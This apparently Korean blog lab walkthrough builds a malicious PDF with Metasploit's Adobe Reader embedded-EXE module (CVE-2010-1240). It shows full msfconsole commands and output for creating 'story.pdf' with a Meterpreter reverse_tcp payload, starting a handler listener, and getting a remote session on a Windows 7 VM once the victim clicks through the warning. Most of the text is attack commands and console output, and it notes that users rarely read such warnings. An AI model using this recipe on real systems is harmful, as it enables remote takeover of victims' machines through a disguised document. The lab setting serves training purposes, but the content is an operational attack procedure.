- 사용 시스템
kaliLinux
windows 7
- 취약한 타겟
Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)
> 현재 버전은 안되기 때문에 실습을 위해 따로 다운받는다.
( 용량이 커서 올리지 못하고 필요하면 보내드릴게요. > 버전이 낮아 취약한 파일입니다. VM의 window7에 설치)
- 모듈
exploit/windows/fileformat/adobe_pdf_embedded_exe
[참고]
OSVDB (63667)
https://cvedetails.com/cve/CVE-2010-1240/
- PDF 파일 포멧을 이용하여 악성 코드 제작
(win7)
- 취약한 Adobe Reader 설치 ( 특별한 옵션없이 설치합니다. )
(kali)
- 악성코드 제작
[TERM 1]
# msfconsole -q
|
msf > help search Usage: search [keywords] Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name platform : Modules affecting this platform ref : Modules with a matching ref type : Modules of a specific type (exploit, auxiliary, or post) Examples: search cve:2009 type:exploit app:client msf > search cve:2010-1240 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript) msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > show options Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe): Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME /usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf yes The Input PDF filename. LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English) msf exploit(adobe_pdf_embedded_exe) > set FILENAME story.pdf FILENAME => story.pdf msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > show options Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe): Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME story.pdf no The output filename. INFILENAME /usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf yes The Input PDF filename. LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English) msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf exploit(adobe_pdf_embedded_exe) > exploit [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Parsing Successful. Creating 'story.pdf' file... [+] story.pdf stored at /root/.msf4/local/story.pdf |
|
[TERM 2]
- PDF 파일 생성 확인
# cd /root/.msf4/local
# ls
|
story.pdf |
|
# cp story.pdf /share
[TERM 1]
- Listen 상태로 대기
|
msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.27.50:4444 [*] Starting the payload handler... |
|
(win7)
> 공유 폴더 share 에 올려둔 story.pdf 파일을 가져와 열어본다.
> 공유파일에서 옮겨오기
> 실행
> 실습이니 템플릿은 바탕화면에 간단히 저장합니다.
> 실행하면 이런 창이 뜹니다.
> 이 PDF 파일을 실행하면 시작되도록 설정되어 있습니다. -> 위험하다는 것을 알려주지만 일반 사용자는 pdf의 내용을 보기위해 보통 잘 읽지 않고 열기를 누를 것 입니다.
> 이 메시지를 다시 표시 안함을 체크하고 열기를 누릅니다.
(kali)
|
[*] Sending stage (957487 bytes) to 192.168.27.202 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49344) at 2017-11-11 21:53:39 +0900 meterpreter > meterpreter > sysinfo Computer : ADMINSTRATOR-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.202 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > |
|
> 연결된 것을 확인할 수 있다. 간단히 sysinfo 명령어를 수행해보고 종료한다.
'Security > 정보 수집' 카테고리의 다른 글
| 패스워드 해시 덤프 ( password the hash dump ) (0) | 2017.11.11 |
|---|---|
| 키보드 스니핑과 스크린샷 (0) | 2017.11.11 |
| virustotal 사이트 사용하기 (0) | 2017.11.11 |
| Backdoor Factory를 사용한 악성코드 제작 (0) | 2017.11.11 |
| 메타스플로잇을 이용하여 윈도우 2008 로그 삭제하기 (0) | 2017.11.10 |
